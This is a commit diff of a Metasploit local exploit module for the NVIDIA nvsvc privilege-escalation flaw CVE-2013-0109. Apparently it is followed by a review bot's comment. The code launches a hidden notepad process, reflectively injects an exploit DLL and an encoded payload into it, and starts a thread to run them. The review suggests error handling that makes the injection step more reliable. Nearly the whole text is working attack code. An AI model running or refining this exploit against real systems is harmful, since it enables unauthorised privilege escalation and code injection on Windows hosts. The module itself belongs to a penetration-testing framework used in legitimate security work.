Re-add RDI mixin changes
parent
e22b4ba88c
commit
41c538856a
@ -120,12 +120,6 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def create_proc
|
|
||||||
windir = expand_path("%windir%")
|
|
||||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
|
||||||
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
|
||||||
end
|
|
||||||
|
|
||||||
def is_running?
|
def is_running?
|
||||||
begin
|
begin
|
||||||
status = service_status('nvsvc')
|
status = service_status('nvsvc')
|
||||||
|
@ -134,60 +128,39 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
print_error("Unable to retrieve service status")
|
print_error("Unable to retrieve service status")
|
||||||
return false
|
return false
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
unless is_running?
|
if is_system?
|
||||||
print_error("Service not running - attempting to start")
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||||
res = service_start('nvsvc')
|
|
||||||
case res
|
|
||||||
when 0
|
|
||||||
print_good("Service started")
|
|
||||||
when 1
|
|
||||||
print_status("Service already started")
|
|
||||||
else
|
|
||||||
fail_with(Exploit::Failure::Unknown, "Unable to start service")
|
|
||||||
end
|
|
||||||
else
|
|
||||||
print_good("Service is running")
|
|
||||||
end
|
end
|
||||||
|
|
||||||
dll = ''
|
unless check == Exploit::CheckCode::Vulnerable
|
||||||
offset = nil
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||||
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
|
||||||
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
|
||||||
|
|
||||||
pay = payload.encoded
|
|
||||||
|
|
||||||
bo = dll.index('PAYLOAD:')
|
|
||||||
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
|
||||||
dll[bo, pay.length] = [pay].pack("a*")
|
|
||||||
|
|
||||||
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
|
||||||
|
|
||||||
pe.exports.entries.each do |entry|
|
|
||||||
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
|
||||||
offset = pe.rva_to_file_offset( entry.rva )
|
|
||||||
break
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
print_error("No offset found") unless offset
|
print_status("Launching notepad to host the exploit...")
|
||||||
|
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
||||||
|
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||||
|
print_good("Process #{process.pid} launched.")
|
||||||
|
|
||||||
new_pid = create_proc
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||||
|
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||||
|
"CVE-2013-0109", "nvidia_nvsvc.x86.dll")
|
||||||
|
library_path = ::File.expand_path(library_path)
|
||||||
|
|
||||||
if not new_pid
|
print_status("Injecting exploit into #{process.pid} ...")
|
||||||
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
|
||||||
end
|
|
||||||
|
|
||||||
vprint_status("Injecting payload into memory")
|
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||||
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
payload_mem = inject_into_process(host_process, payload.encoded)
|
||||||
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
|
||||||
host_process.memory.protect(mem)
|
# invoke the exploit, passing in the address of the payload that
|
||||||
host_process.memory.write(mem, dll)
|
# we want invoked on successful exploitation.
|
||||||
print_status("Executing exploit...")
|
print_status("Payload injected. Executing exploit...")
|
||||||
host_process.thread.create(mem+offset)
|
host_process.thread.create(exploit_mem + offset, payload_mem)
|
||||||
|
|
||||||
|
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
|
||||||
end
|
end
|
||||||
end
|
end
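Review bot: The hidden notepad started by `client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})` is never cleaned up when `inject_dll_into_process` or `inject_into_process` fails, so every failed run leaves an orphaned host process behind; the removed `if not new_pid ... fail_with` guard has no replacement on the new side. Wrapping the injection steps in a begin/rescue that kills `process.pid` before calling `fail_with` would close that gap. The hunk does not show whether the RDI mixin raises or returns nil on failure; if it returns nil, `exploit_mem + offset` would fail with a NoMethodError, so a nil check on the returned pair is needed in addition to the rescue. The two consecutive status lines `Reflectively injecting the exploit DLL into #{process.pid}...` and `Injecting exploit into #{process.pid} ...` announce the same step, so one of them can go. `exploit` is fully inside the hunk.
```ruby
  host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
  print_good("Process #{process.pid} launched.")

  begin
    # … unchanged: library_path resolution, inject_dll_into_process, inject_into_process, thread.create …
  rescue Rex::Post::Meterpreter::RequestError => e
    # Do not leave the hidden host process running when injection fails.
    client.sys.process.kill(process.pid)
    fail_with(Exploit::Failure::Unknown, "Injection failed: #{e.message}")
  end
```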
|